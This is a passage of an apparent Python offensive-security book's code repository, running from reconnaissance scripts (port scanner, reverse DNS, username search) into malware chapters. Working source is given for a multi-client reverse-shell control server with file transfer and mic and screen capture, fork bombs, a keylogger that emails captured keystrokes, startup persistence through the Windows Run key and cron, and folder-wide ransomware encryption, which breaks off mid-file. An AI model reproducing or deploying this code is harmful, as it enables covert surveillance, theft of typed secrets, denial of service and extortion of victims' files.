print(f" Service: {port_service_name} Product: {port_product_name} Version: {port_product_version}") 55 | print(f" Extra info: {port_extrainfo} CPE: {port_cpe}") 56 | print("-"*50) 57 | 58 | if open_udp_ports: 59 | print(open_udp_ports) 60 | -------------------------------------------------------------------------------- /chapter-1/port-scanning/port_scanner.py: -------------------------------------------------------------------------------- 1 | import socket # for connecting 2 | from colorama import init, Fore 3 | 4 | # some colors 5 | init() 6 | GREEN = Fore.GREEN 7 | RESET = Fore.RESET 8 | GRAY = Fore.LIGHTBLACK_EX 9 | 10 | def is_port_open(host, port): 11 | """ 12 | determine whether `host` has the `port` open 13 | """ 14 | # creates a new socket 15 | s = socket.socket() 16 | try: 17 | # tries to connect to host using that port 18 | s.connect((host, port)) 19 | # make timeout if you want it a little faster ( less accuracy ) 20 | s.settimeout(0.2) 21 | except: 22 | # cannot connect, port is closed 23 | # return false 24 | return False 25 | else: 26 | # the connection was established, port is open! 27 | return True 28 | 29 | # get the host from the user 30 | host = input("Enter the host:") 31 | # iterate over ports, from 1 to 1024 32 | for port in range(1, 1025): 33 | if is_port_open(host, port): 34 | print(f"{GREEN}[+] {host}:{port} is open {RESET}") 35 | else: 36 | print(f"{GRAY}[!] {host}:{port} is closed {RESET}", end="\r") -------------------------------------------------------------------------------- /chapter-1/port-scanning/requirements.txt: -------------------------------------------------------------------------------- 1 | colorama 2 | python-nmap -------------------------------------------------------------------------------- /chapter-1/reverse-dns-lookup/requirements.txt: -------------------------------------------------------------------------------- 1 | requests -------------------------------------------------------------------------------- /chapter-1/reverse-dns-lookup/reverse_dns_lookup_using_socket.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | def reverse_dns_lookup(ip_address): 4 | try: 5 | host, _, _ = socket.gethostbyaddr(ip_address) 6 | return host 7 | except socket.herror: 8 | return None 9 | 10 | # Example usage 11 | if __name__ == "__main__": 12 | ip_address = "8.8.8.8" # Example IP address (Google DNS) 13 | domain_name = reverse_dns_lookup(ip_address) 14 | if domain_name: 15 | print(f"The domain name for IP address {ip_address} is {domain_name}") 16 | else: 17 | print(f"No domain name found for IP address {ip_address}") 18 | -------------------------------------------------------------------------------- /chapter-1/reverse-dns-lookup/reverse_dns_lookup_using_viewdns.py: -------------------------------------------------------------------------------- 1 | # Import the necessary libraries 2 | import argparse 3 | import ipaddress 4 | import requests 5 | 6 | API_KEY = "YOUR_VIEWDNS_API_KEY" 7 | 8 | # Function to Check if IP address is valid. 9 | def is_valid_ip(ip): 10 | try: 11 | ipaddress.ip_address(ip) 12 | return True 13 | except ValueError: 14 | return False 15 | 16 | 17 | # Get domains on the same IP 18 | def get_domains_on_same_ip(ip): 19 | url = f"https://api.viewdns.info/reverseip/?host={ip}&apikey={API_KEY}&output=json" 20 | response = requests.get(url) 21 | if response.status_code == 200: 22 | try: 23 | data = response.json() 24 | except: 25 | print("[-] Error parsing JSON response.") 26 | print(response.text) 27 | return [] 28 | domain_count = data["response"]["domain_count"] 29 | print(f"\n[*] Found {domain_count} domains on {ip}:") 30 | if "response" in data and "domains" in data["response"]: 31 | websites = data["response"]["domains"] 32 | return websites 33 | return [] 34 | 35 | 36 | # Get user arguments and execute. 37 | def main(): 38 | parser = argparse.ArgumentParser(description="Perform IP reverse lookup. Requires a ViewDNS API key.") 39 | parser.add_argument("ips", nargs="+", help="IP address(es) to perform reverse lookup on.") 40 | args = parser.parse_args() 41 | 42 | for ip in args.ips: 43 | if not is_valid_ip(ip): 44 | print(f"[-] Invalid IP address: {ip}") 45 | continue 46 | # Get other domains on the same IP 47 | domains = get_domains_on_same_ip(ip) 48 | if domains: 49 | for d in domains: 50 | print(f"[+] {d}") 51 | else: 52 | print("[-] No other domains found on the same IP.") 53 | 54 | 55 | if __name__ == "__main__": 56 | main() 57 | -------------------------------------------------------------------------------- /chapter-1/username-search-tool/README.md: -------------------------------------------------------------------------------- 1 | ## Steps to Use Sherlock Username Search Tool 2 | - `$ pip install sherlock-project` 3 | - `$ sherlock exampleuser1 exampleuser2` -------------------------------------------------------------------------------- /chapter-1/username-search-tool/requirements.txt: -------------------------------------------------------------------------------- 1 | sherlock-project 2 | requests -------------------------------------------------------------------------------- /chapter-1/username-search-tool/username_search_custom.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | def check_username(username, platform): 4 | """ 5 | Checks if a username exists on a given platform. 6 | 7 | Args: 8 | username (str): The username to check. 9 | platform (str): The URL template for the platform, with '{username}' placeholder. 10 | 11 | Returns: 12 | bool: True if the username exists, False otherwise. 13 | """ 14 | url = platform.format(username=username) 15 | response = requests.get(url) 16 | if response.status_code == 200: 17 | return True 18 | return False 19 | 20 | def search_username(username): 21 | """ 22 | Searches for a username across multiple social media platforms. 23 | 24 | Args: 25 | username (str): The username to search for. 26 | 27 | Returns: 28 | dict: A dictionary containing the platforms where the username was found, 29 | with the platform name as the key and the corresponding URL as the value. 30 | Returns an empty dictionary if no results are found. 31 | """ 32 | platforms = { 33 | "GitHub": "https://github.com/{username}", 34 | "Twitter": "https://twitter.com/{username}", 35 | "Instagram": "https://www.instagram.com/{username}/", 36 | "Reddit": "https://www.reddit.com/user/{username}", 37 | "Facebook": "https://www.facebook.com/{username}", 38 | "LinkedIn": "https://www.linkedin.com/in/{username}", 39 | } 40 | results = {} 41 | for platform, url in platforms.items(): 42 | if check_username(username, url): 43 | results[platform] = url.format(username=username) 44 | return results 45 | 46 | # Example usage 47 | if __name__ == "__main__": 48 | username = "exampleuser" 49 | results = search_username(username) 50 | if results: 51 | print(f"Found {username} on the following platforms:") 52 | for platform, url in results.items(): 53 | print(f"{platform}: {url}") 54 | else: 55 | print(f"No results found for {username}") 56 | -------------------------------------------------------------------------------- /chapter-2/advanced-reverse-shell/notes.txt: -------------------------------------------------------------------------------- 1 | If you have the following error when importing sounddevice: 2 | 3 | OSError: PortAudio library not found 4 | 5 | Then simply install libportaudio2 on your Linux machine: 6 | 7 | $ apt install libportaudio2 -------------------------------------------------------------------------------- /chapter-2/advanced-reverse-shell/requirements.txt: -------------------------------------------------------------------------------- 1 | pyautogui 2 | sounddevice 3 | scipy 4 | psutil 5 | tabulate 6 | gputil 7 | tqdm -------------------------------------------------------------------------------- /chapter-2/advanced-reverse-shell/server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import subprocess 3 | from threading import Thread 4 | import re 5 | import os 6 | 7 | import tabulate 8 | import tqdm 9 | 10 | SERVER_HOST = "0.0.0.0" 11 | SERVER_PORT = 5003 12 | BUFFER_SIZE = 1440 # max size of messages, setting to 1440 after experimentation, MTU size 13 | # separator string for sending 2 messages in one go 14 | SEPARATOR = "" 15 | 16 | class Server: 17 | def __init__(self, host, port): 18 | self.host = host 19 | self.port = port 20 | # initialize the server socket 21 | self.server_socket = self.get_server_socket() 22 | # a dictionary of client addresses and sockets 23 | self.clients = {} 24 | # a dictionary mapping each client to their current working directory 25 | self.clients_cwd = {} 26 | # the current client that the server is interacting with 27 | self.current_client = None 28 | 29 | def get_server_socket(self, custom_port=None): 30 | # create a socket object 31 | s = socket.socket() 32 | # bind the socket to all IP addresses of this host 33 | if custom_port: 34 | # if a custom port is set, use it instead 35 | port = custom_port 36 | else: 37 | port = self.port 38 | s.bind((self.host, port)) 39 | # make the PORT reusable, to prevent: 40 | # when you run the server multiple times in Linux, Address already in use error will raise 41 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 42 | s.listen(5) 43 | print(f"Listening as {SERVER_HOST}:{port} ...") 44 | return s 45 | 46 | def accept_connection(self): 47 | while True: 48 | # accept any connections attempted 49 | try: 50 | client_socket, client_address = self.server_socket.accept() 51 | except OSError as e: 52 | print("Server socket closed, exiting...") 53 | break 54 | print(f"{client_address[0]}:{client_address[1]} Connected!") 55 | # receiving the current working directory of the client 56 | cwd = client_socket.recv(BUFFER_SIZE).decode() 57 | print("[+] Current working directory:", cwd) 58 | # add the client to the Python dicts 59 | self.clients[client_address] = client_socket 60 | self.clients_cwd[client_address] = cwd 61 | 62 | def accept_connections(self): 63 | # start a separate thread to accept connections 64 | self.connection_thread = Thread(target=self.accept_connection) 65 | # and set it as a daemon thread 66 | self.connection_thread.daemon = True 67 | self.connection_thread.start() 68 | 69 | def close_connections(self): 70 | """Close all the client sockets and server socket. 71 | Used for closing the program""" 72 | for _, client_socket in self.clients.items(): 73 | client_socket.close() 74 | self.server_socket.close() 75 | 76 | def start_interpreter(self): 77 | """Custom interpreter""" 78 | while True: 79 | command = input("interpreter $> ") 80 | if re.search(r"help\w*", command): 81 | # "help" is detected, print the help 82 | print("Interpreter usage:") 83 | print(tabulate.tabulate([["Command", "Usage"], [ 84 | "help", 85 | "Print this help message", 86 | ], ["list", 87 | "List all connected users", 88 | ], ["use [machine_index]", 89 | "Start reverse shell on the specified client, " \ 90 | "e.g 'use 1' will start the reverse shell on the second connected machine, " \ 91 | "and 0 for the first one.", 92 | ] 93 | ])) 94 | print("="*30, "Custom commands inside the reverse shell", "="*30) 95 | print(tabulate.tabulate([["Command", "Usage"], [ 96 | "abort", 97 | "Remove the client from the connected clients", 98 | ], ["exit|quit", 99 | "Get back to interpreter without removing the client", 100 | ], ["screenshot [path_to_img].png", 101 | "Take a screenshot of the main screen and save it as an image file." 102 | ], ["recordmic [path_to_audio].wav [number_of_seconds]", 103 | "Record the default microphone for number of seconds " \ 104 | "and save it as an audio file in the specified file." \ 105 | " An example is 'recordmic test.wav 5' will record for 5 " \ 106 | "seconds and save to test.wav in the current working directory" 107 | ], ["download [path_to_file]", 108 | "Download the specified file from the client" 109 | ], ["upload [path_to_file]", 110 | "Upload the specified file from your local machine to the client" 111 | ]])) 112 | elif re.search(r"list\w*", command): 113 | # list all the connected clients 114 | connected_clients = [] 115 | for index, ((client_host, client_port), cwd) in enumerate(self.clients_cwd.items()): 116 | connected_clients.append([index, client_host, client_port, cwd]) 117 | # print the connected clients in tabular form 118 | print(tabulate.tabulate(connected_clients, headers=["Index", "Address", "Port", "CWD"])) 119 | elif (match := re.search(r"use\s*(\w*)", command)): 120 | try: 121 | # get the index passed to the command 122 | client_index = int(match.group(1)) 123 | except ValueError: 124 | # there is no digit after the use command 125 | print("Please insert the index of the client, a number.") 126 | continue 127 | else: 128 | try: 129 | self.current_client = list(self.clients)[client_index] 130 | except IndexError: 131 | print(f"Please insert a valid index, maximum is {len(self.clients)}.") 132 | continue 133 | else: 134 | # start the reverse shell as self.current_client is set 135 | self.start_reverse_shell() 136 | elif command.lower() in ["exit", "quit"]: 137 | # exit out of the interpreter if exit|quit are passed 138 | break 139 | elif command == "": 140 | # do nothing if command is empty (i.e a new line) 141 | pass 142 | else: 143 | print("Unavailable command:", command) 144 | self.close_connections() 145 | 146 | def start(self): 147 | """Method responsible for starting the server: 148 | Accepting client connections and starting the main interpreter""" 149 | self.accept_connections() 150 | self.start_interpreter() 151 | 152 | def start_reverse_shell(self): 153 | # get the current working directory from the current client 154 | cwd = self.clients_cwd[self.current_client] 155 | # get the socket too 156 | client_socket = self.clients[self.current_client] 157 | while True: 158 | # get the command from prompt 159 | command = input(f"{cwd} $> ") 160 | if not command.strip(): 161 | # empty command 162 | continue 163 | if (match := re.search(r"local\s*(.*)", command)): 164 | local_command = match.group(1) 165 | if (cd_match := re.search(r"cd\s*(.*)", local_command)): 166 | # if it's a 'cd' command, change directory instead of using subprocess.getoutput 167 | cd_path = cd_match.group(1) 168 | if cd_path: 169 | os.chdir(cd_path) 170 | else: 171 | local_output = subprocess.getoutput(local_command) 172 | print(local_output) 173 | # if it's a local command (i.e starts with local), do not send it to the client 174 | continue 175 | # send the command to the client 176 | client_socket.sendall(command.encode()) 177 | if command.lower() in ["exit", "quit"]: 178 | # if the command is exit, just break out of the loop 179 | break 180 | elif command.lower() == "abort": 181 | # if the command is abort, remove the client from the dicts & exit 182 | del self.clients[self.current_client] 183 | del self.clients_cwd[self.current_client] 184 | break 185 | elif (match := re.search(r"download\s*(.*)", command)): 186 | # receive the file 187 | self.receive_file() 188 | elif (match := re.search(r"upload\s*(.*)", command)): 189 | # send the specified file if it exists 190 | filename = match.group(1) 191 | if not os.path.isfile(filename): 192 | print(f"The file {filename} does not exist in the local machine.") 193 | else: 194 | self.send_file(filename) 195 | # retrieve command results 196 | output = self.receive_all_data(client_socket, BUFFER_SIZE).decode() 197 | # split command output and current directory 198 | results, cwd = output.split(SEPARATOR) 199 | # update the cwd 200 | self.clients_cwd[self.current_client] = cwd 201 | # print output 202 | print(results) 203 | 204 | self.current_client = None 205 | 206 | def receive_all_data(self, socket, buffer_size): 207 | """Function responsible for calling socket.recv() 208 | repeatedly until no data is to be received""" 209 | data = b"" 210 | while True: 211 | output = socket.recv(buffer_size) 212 | data += output 213 | if not output or len(output) < buffer_size: 214 | break 215 | # if len(output) < buffer_size: 216 | # data += self.receive_all_data(socket, buffer_size) 217 | return data 218 | 219 | def receive_file(self, port=5002): 220 | # make another server socket with a custom port 221 | s = self.get_server_socket(custom_port=port) 222 | # accept client connections 223 | client_socket, client_address = s.accept() 224 | print(f"{client_address} connected.") 225 | # receive the file 226 | Server._receive_file(client_socket) 227 | 228 | def send_file(self, filename, port=5002): 229 | # make another server socket with a custom port 230 | s = self.get_server_socket(custom_port=port) 231 | # accept client connections 232 | client_socket, client_address = s.accept() 233 | print(f"{client_address} connected.") 234 | # receive the file 235 | Server._send_file(client_socket, filename) 236 | 237 | @classmethod 238 | def _receive_file(cls, s: socket.socket, buffer_size=4096): 239 | # receive the file infos using socket 240 | received = s.recv(buffer_size).decode() 241 | filename, filesize = received.split(SEPARATOR) 242 | # remove absolute path if there is 243 | filename = os.path.basename(filename) 244 | # convert to integer 245 | filesize = int(filesize) 246 | # start receiving the file from the socket 247 | # and writing to the file stream 248 | progress = tqdm.tqdm(range(filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024) 249 | with open(filename, "wb") as f: 250 | while True: 251 | # read 1024 bytes from the socket (receive) 252 | bytes_read = s.recv(buffer_size) 253 | if not bytes_read: 254 | # nothing is received 255 | # file transmitting is done 256 | break 257 | # write to the file the bytes we just received 258 | f.write(bytes_read) 259 | # update the progress bar 260 | progress.update(len(bytes_read)) 261 | # close the socket 262 | s.close() 263 | 264 | @classmethod 265 | def _send_file(cls, s: socket.socket, filename, buffer_size=4096): 266 | # get the file size 267 | filesize = os.path.getsize(filename) 268 | # send the filename and filesize 269 | s.send(f"{filename}{SEPARATOR}{filesize}".encode()) 270 | # start sending the file 271 | progress = tqdm.tqdm(range(filesize), f"Sending {filename}", unit="B", unit_scale=True, unit_divisor=1024) 272 | with open(filename, "rb") as f: 273 | while True: 274 | # read the bytes from the file 275 | bytes_read = f.read(buffer_size) 276 | if not bytes_read: 277 | # file transmitting is done 278 | break 279 | # we use sendall to assure transimission in 280 | # busy networks 281 | s.sendall(bytes_read) 282 | # update the progress bar 283 | progress.update(len(bytes_read)) 284 | # close the socket 285 | s.close() 286 | 287 | 288 | if __name__ == "__main__": 289 | server = Server(SERVER_HOST, SERVER_PORT) 290 | server.start() -------------------------------------------------------------------------------- /chapter-2/fork-bomb/README.md: -------------------------------------------------------------------------------- 1 | Run `end_python_processes.py` script if your computer starts to slow down while running one of the scripts. It will kill all Python processes. -------------------------------------------------------------------------------- /chapter-2/fork-bomb/end_python_processes.py: -------------------------------------------------------------------------------- 1 | import platform 2 | import subprocess 3 | 4 | def end_python_processes(): 5 | """ 6 | Terminates all running python.exe processes on the system. 7 | This function is designed to work across different platforms (Windows, macOS, Linux). 8 | """ 9 | system = platform.system().lower() 10 | 11 | try: 12 | if system == "windows": 13 | # For Windows 14 | subprocess.run(["taskkill", "/F", "/IM", "python.exe"], check=True) 15 | elif system in ["darwin", "linux"]: 16 | # For macOS and Linux 17 | subprocess.run(["pkill", "-f", "python"], check=True) 18 | else: 19 | print(f"Unsupported operating system: {system}") 20 | return 21 | 22 | print("All Python processes have been terminated successfully.") 23 | except subprocess.CalledProcessError: 24 | print("No Python processes found or unable to terminate processes.") 25 | except Exception as e: 26 | print(f"An error occurred: {str(e)}") 27 | 28 | if __name__ == "__main__": 29 | # Confirm with the user before proceeding 30 | confirmation = input("This will terminate all Python processes. Are you sure? (y/n): ") 31 | 32 | if confirmation.lower() == 'y': 33 | end_python_processes() 34 | else: 35 | print("Operation cancelled.") 36 | -------------------------------------------------------------------------------- /chapter-2/fork-bomb/fork_bomb.py: -------------------------------------------------------------------------------- 1 | # fork_bomb.py 2 | """Using `multiprocessing` module to spawn processes as a cross-platform fork bomb.""" 3 | # Import necessary modules. 4 | from multiprocessing import Process, cpu_count 5 | import time 6 | 7 | # Define a function named counter that takes a number parameter. 8 | def counter(number): 9 | # Run a loop until number reaches 0. 10 | while number > 0: 11 | number -= 1 12 | # Introduce a sleep of 200 ms to intentionally slow down the loop. 13 | time.sleep(0.2) # Adjust sleep time as needed to make it slower. 14 | 15 | 16 | def spawn_processes(num_processes): 17 | # Create a list of Process instances, each targeting the counter function. 18 | processes = [Process(target=counter, args=(1000,)) for _ in range(num_processes)] 19 | # Start each process. 20 | for process in processes: 21 | process.start() 22 | print(f"Started process {process.pid}.") 23 | # Wait for each process to finish before moving on. 24 | for process in processes: 25 | process.join() 26 | print(f"Process {process.pid} has finished.") 27 | 28 | # Define the main function. 29 | def main(): 30 | # Get the number of logical processors on the system. 31 | num_processors = cpu_count() 32 | # Create a large number of processes (num_processors * 200). 33 | num_processes = num_processors * 200 # Adjust the number of processes to spawn as needed. 34 | print(f"Number of logical processors: {num_processors}") 35 | print(f"Creating {num_processes} processes.") 36 | print("Warning: This will consume a lot of system resources, and potentially freeze your PC, make sure to adjust the number of processes and sleep seconds as needed.") 37 | # Run an infinite loop if you want. 38 | # while True: 39 | # spawn_processes(num_processes) 40 | # For demonstration purposes, run the function once and monitor the task manager. 41 | spawn_processes(num_processes) 42 | 43 | 44 | # Execute the main function. 45 | if __name__ == "__main__": 46 | main() -------------------------------------------------------------------------------- /chapter-2/fork-bomb/fork_bomb_simplest.py: -------------------------------------------------------------------------------- 1 | # fork_bomb_simplest.py 2 | """Simplest form of a fork bomb. It creates a new process in an infinite loop using os.fork(). 3 | It only works on Unix-based systems, and it will consume all system resources, potentially freezing the system. 4 | Be careful when running this code.""" 5 | import os 6 | # import time 7 | 8 | while True: 9 | os.fork() 10 | # time.sleep(0.5) # Uncomment this line to slow down the fork bomb -------------------------------------------------------------------------------- /chapter-2/fork-bomb/terminal_spawn_bomb.py: -------------------------------------------------------------------------------- 1 | # terminal_spawn_bomb.py 2 | import os 3 | import subprocess 4 | import time 5 | 6 | # List of common terminal emulators 7 | terminal_emulators = [ 8 | "gnome-terminal", # GNOME 9 | "konsole", # KDE 10 | "xfce4-terminal", # XFCE 11 | "lxterminal", # LXDE 12 | "mate-terminal", # MATE 13 | "terminator", "xterm", "urxvt" 14 | ] 15 | 16 | def open_terminal(): 17 | for emulator in terminal_emulators: 18 | try: 19 | if subprocess.call(["which", emulator], stdout=subprocess.DEVNULL) == 0: 20 | os.system(f"{emulator} &") 21 | return True 22 | except Exception as e: 23 | continue 24 | print("No known terminal emulator found!") 25 | return False 26 | 27 | while True: 28 | if os.name == "nt": 29 | os.system("start cmd") 30 | else: 31 | if not open_terminal(): 32 | break # Break the loop if no terminal emulator is found 33 | # Introduce a sleep of 500 ms to intentionally slow down the loop so you can stop the script. 34 | time.sleep(0.5) # Adjust sleep time as needed to make it slower. 35 | -------------------------------------------------------------------------------- /chapter-2/keylogger/keylogger.py: -------------------------------------------------------------------------------- 1 | import keyboard # for keylogs 2 | import smtplib # for sending email using SMTP protocol (gmail) 3 | # Timer is to make a method runs after an `interval` amount of time 4 | from threading import Timer 5 | from datetime import datetime 6 | from email.mime.multipart import MIMEMultipart 7 | from email.mime.text import MIMEText 8 | 9 | SEND_REPORT_EVERY = 60 # in seconds, 60 means 1 minute and so on 10 | EMAIL_ADDRESS = "email@provider.tld" 11 | EMAIL_PASSWORD = "password_here" 12 | 13 | class Keylogger: 14 | def __init__(self, interval, report_method="email"): 15 | # we gonna pass SEND_REPORT_EVERY to interval 16 | self.interval = interval 17 | self.report_method = report_method 18 | # this is the string variable that contains the log of all 19 | # the keystrokes within `self.interval` 20 | self.log = "" 21 | # record start & end datetimes 22 | self.start_dt = datetime.now() 23 | self.end_dt = datetime.now() 24 | 25 | def callback(self, event): 26 | """ 27 | This callback is invoked whenever a keyboard event is occured 28 | (i.e when a key is released in this example) 29 | """ 30 | name = event.name 31 | if len(name) > 1: 32 | # not a character, special key (e.g ctrl, alt, etc.) 33 | # uppercase with [] 34 | if name == "space": 35 | # " " instead of "space" 36 | name = " " 37 | elif name == "enter": 38 | # add a new line whenever an ENTER is pressed 39 | name = "[ENTER]\n" 40 | elif name == "decimal": 41 | name = "." 42 | else: 43 | # replace spaces with underscores 44 | name = name.replace(" ", "_") 45 | name = f"[{name.upper()}]" 46 | # finally, add the key name to our global `self.log` variable 47 | self.log += name 48 | 49 | def update_filename(self): 50 | # construct the filename to be identified by start & end datetimes 51 | start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "") 52 | end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "") 53 | self.filename = f"keylog-{start_dt_str}_{end_dt_str}" 54 | 55 | def report_to_file(self): 56 | """This method creates a log file in the current directory that contains 57 | the current keylogs in the `self.log` variable""" 58 | # open the file in write mode (create it) 59 | with open(f"{self.filename}.txt", "w") as f: 60 | # write the keylogs to the file 61 | print(self.log, file=f) 62 | print(f"[+] Saved {self.filename}.txt") 63 | 64 | def prepare_mail(self, message): 65 | """Utility function to construct a MIMEMultipart from a text 66 | It creates an HTML version as well as text version 67 | to be sent as an email""" 68 | msg = MIMEMultipart("alternative") 69 | msg["From"] = EMAIL_ADDRESS 70 | msg["To"] = EMAIL_ADDRESS 71 | msg["Subject"] = "Keylogger logs" 72 | # simple paragraph, feel free to edit 73 | html = f"

{message}

" 74 | text_part = MIMEText(message, "plain") 75 | html_part = MIMEText(html, "html") 76 | msg.attach(text_part) 77 | msg.attach(html_part) 78 | # after making the mail, convert back as string message 79 | return msg.as_string() 80 | 81 | def sendmail(self, email, password, message, verbose=1): 82 | # manages a connection to an SMTP server 83 | # in our case it's for Microsoft365, Outlook, Hotmail, and live.com 84 | server = smtplib.SMTP(host="smtp.office365.com", port=587) 85 | # connect to the SMTP server as TLS mode ( for security ) 86 | server.starttls() 87 | # login to the email account 88 | server.login(email, password) 89 | # send the actual message after preparation 90 | server.sendmail(email, email, self.prepare_mail(message)) 91 | # terminates the session 92 | server.quit() 93 | if verbose: 94 | print(f"{datetime.now()} - Sent an email to {email} containing: {message}") 95 | 96 | def report(self): 97 | """ 98 | This function gets called every `self.interval` 99 | It basically sends keylogs and resets `self.log` variable 100 | """ 101 | if self.log: 102 | # if there is something in log, report it 103 | self.end_dt = datetime.now() 104 | # update `self.filename` 105 | self.update_filename() 106 | if self.report_method == "email": 107 | self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) 108 | elif self.report_method == "file": 109 | self.report_to_file() 110 | # if you don't want to print in the console, comment below line 111 | print(f"[{self.filename}] - {self.log}") 112 | self.start_dt = datetime.now() 113 | self.log = "" 114 | timer = Timer(interval=self.interval, function=self.report) 115 | # set the thread as daemon (dies when main thread die) 116 | timer.daemon = True 117 | # start the timer 118 | timer.start() 119 | 120 | def start(self): 121 | # record the start datetime 122 | self.start_dt = datetime.now() 123 | # start the keylogger 124 | keyboard.on_release(callback=self.callback) 125 | # start reporting the keylogs 126 | self.report() 127 | # make a simple message 128 | print(f"{datetime.now()} - Started keylogger") 129 | # block the current thread, wait until CTRL+C is pressed 130 | keyboard.wait() 131 | 132 | 133 | if __name__ == "__main__": 134 | # if you want a keylogger to send to your email 135 | # keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="email") 136 | # if you want a keylogger to record keylogs to a local file 137 | # (and then send it using your favorite method) 138 | keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="file") 139 | keylogger.start() -------------------------------------------------------------------------------- /chapter-2/keylogger/requirements.txt: -------------------------------------------------------------------------------- 1 | keyboard -------------------------------------------------------------------------------- /chapter-2/persistent-malware/persistent_malware.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | try: 4 | import winreg as reg 5 | except ImportError: 6 | # If the import fails, we are not on Windows 7 | pass 8 | import platform 9 | 10 | 11 | def add_to_registry(): 12 | """ 13 | Add the script to the Windows registry to run at startup. 14 | 15 | This function adds the path to the current script to the Windows registry 16 | under the "Software\Microsoft\Windows\CurrentVersion\Run" key, so that the 17 | script will be executed every time the system starts up. 18 | """ 19 | # Path of the executable to run; e.g., python.exe 20 | exe = sys.executable 21 | # Path to the script to run at startup 22 | script_path = os.path.realpath(__file__) 23 | # Key to modify 24 | key_path = r"Software\Microsoft\Windows\CurrentVersion\Run" 25 | # Specify the command 26 | if exe.endswith("python.exe"): 27 | command = f"{exe} {script_path}" 28 | else: 29 | # If the executable is not python, we need to specify the executable only 30 | command = exe 31 | key = reg.OpenKey(reg.HKEY_CURRENT_USER, key_path, 0, reg.KEY_ALL_ACCESS) 32 | reg.SetValueEx(key, "MyScript", 0, reg.REG_SZ, command) # Add the key to the registry 33 | reg.CloseKey(key) 34 | 35 | 36 | def add_to_cron(): 37 | """ 38 | Add the script to the crontab to run at startup on Linux or macOS. 39 | 40 | This function adds the path to the current script to the user's crontab, 41 | with the "@reboot" directive, so that the script will be executed every 42 | time the system starts up. 43 | """ 44 | # Append new cron job 45 | if sys.executable.endswith("python") or sys.executable.endswith("python3"): 46 | # Path to the script to run at startup 47 | script_path = os.path.realpath(__file__) 48 | command = f'(crontab -l 2>/dev/null; echo "@reboot {sys.executable} {script_path}") | crontab -' 49 | else: 50 | # If the executable is not python, we need to specify the executable only 51 | command = f'(crontab -l 2>/dev/null; echo "@reboot {sys.executable}") | crontab -' 52 | # Execute the command 53 | os.system(command) 54 | 55 | 56 | def make_persistent(): 57 | """ 58 | Make the script persistent across system reboots. 59 | 60 | This function checks the operating system and calls the appropriate 61 | function (add_to_registry or add_to_cron) to make the script run 62 | automatically at system startup. 63 | """ 64 | os_type = platform.system() 65 | if os_type == "Windows": 66 | add_to_registry() 67 | elif os_type in ["Linux", "Darwin"]: # Darwin is macOS 68 | add_to_cron() 69 | 70 | 71 | # Example usage 72 | make_persistent() 73 | 74 | 75 | # enter your malware code here 76 | import time 77 | 78 | while True: 79 | # Do something here 80 | time.sleep(1) 81 | print("Malware running...") 82 | -------------------------------------------------------------------------------- /chapter-2/ransomware/ransomware.py: -------------------------------------------------------------------------------- 1 | import pathlib 2 | import secrets 3 | import os 4 | import base64 5 | import getpass 6 | 7 | import cryptography 8 | from cryptography.fernet import Fernet 9 | from cryptography.hazmat.primitives.kdf.scrypt import Scrypt 10 | 11 | 12 | def generate_salt(size=16): 13 | """Generate the salt used for key derivation, 14 | `size` is the length of the salt to generate""" 15 | return secrets.token_bytes(size) 16 | 17 | 18 | def derive_key(salt, password): 19 | """Derive the key from the `password` using the passed `salt`""" 20 | kdf = Scrypt(salt=salt, length=32, n=2**14, r=8, p=1) 21 | return kdf.derive(password.encode()) 22 | 23 | 24 | def load_salt(): 25 | # load salt from salt.salt file 26 | return open("salt.salt", "rb").read() 27 | 28 | 29 | def generate_key(password, salt_size=16, load_existing_salt=False, save_salt=True): 30 | """ 31 | Generates a key from a `password` and the salt. 32 | If `load_existing_salt` is True, it'll load the salt from a file 33 | in the current directory called "salt.salt". 34 | If `save_salt` is True, then it will generate a new salt 35 | and save it to "salt.salt" 36 | """ 37 | if load_existing_salt: 38 | # load existing salt 39 | salt = load_salt() 40 | elif save_salt: 41 | # generate new salt and save it 42 | salt = generate_salt(salt_size) 43 | with open("salt.salt", "wb") as salt_file: 44 | salt_file.write(salt) 45 | # generate the key from the salt and the password 46 | derived_key = derive_key(salt, password) 47 | # encode it using Base 64 and return it 48 | return base64.urlsafe_b64encode(derived_key) 49 | 50 | 51 | def encrypt(filename, key): 52 | """ 53 | Given a filename (str) and key (bytes), it encrypts the file and write it 54 | """ 55 | f = Fernet(key) 56 | with open(filename, "rb") as file: 57 | # read all file data 58 | file_data = file.read() 59 | # encrypt data 60 | encrypted_data = f.encrypt(file_data) 61 | # write the encrypted file 62 | with open(filename, "wb") as file: 63 | file.write(encrypted_data) 64 | 65 | 66 | def encrypt_folder(foldername, key): 67 | # if it's a folder, encrypt the entire folder (i.e all the containing files) 68 | for child in pathlib.Path(foldername).glob("*"): 69 | if child.is_file(): 70 | print(f"[*] Encrypting {child}") 71 | encrypt(child, key) 72 | elif child.is_dir(): 73 | encrypt_folder(child, key) 74 | 75 | 76 | 77 | def decrypt(filename, key): 78 | """ 79 | Given a filename (str) and key (bytes), it decrypts the file and write it 80 | """ 81 | f = Fernet(key) 82 | with open(filename, "rb") as file: 83 | # read the encrypted data 84 | encrypted_data = file.read() 85 | # decrypt data 86 | try: 87 | decrypted_data = f.decrypt(encrypted_data) 88 | except cryptography.fernet.InvalidToken: 89 | print("[!] Invalid token, most likely the password is incorrect") 90 | return 91 | # write the original file 92 | with open(filename, "wb") as file: 93 | file.write(decrypted_data) 94 | 95 | 96 | def decrypt_folder(foldername, key): 97 | # if it's a folder, decrypt the entire folder 98 | for child in pathlib.Path(foldername).glob("*"): 99 | if child.is_file(): 100 | print(f"[*] Decrypting {child}") 101 | decrypt(child, key) 102 | elif child.is_dir(): 103 | decrypt_folder(child, key) 104 | 105 | 106 | if __name__ == "__main__": 107 | import argparse 108 | parser = argparse.ArgumentParser(description="File Encryptor Script with a Password") 109 | parser.add_argument("path", help="Path to encrypt/decrypt, can be a file or an entire folder") 110 | parser.add_argument("-s", "--salt-size", help="If this is set, a new salt with the passed size is generated", 111 | type=int) 112 | 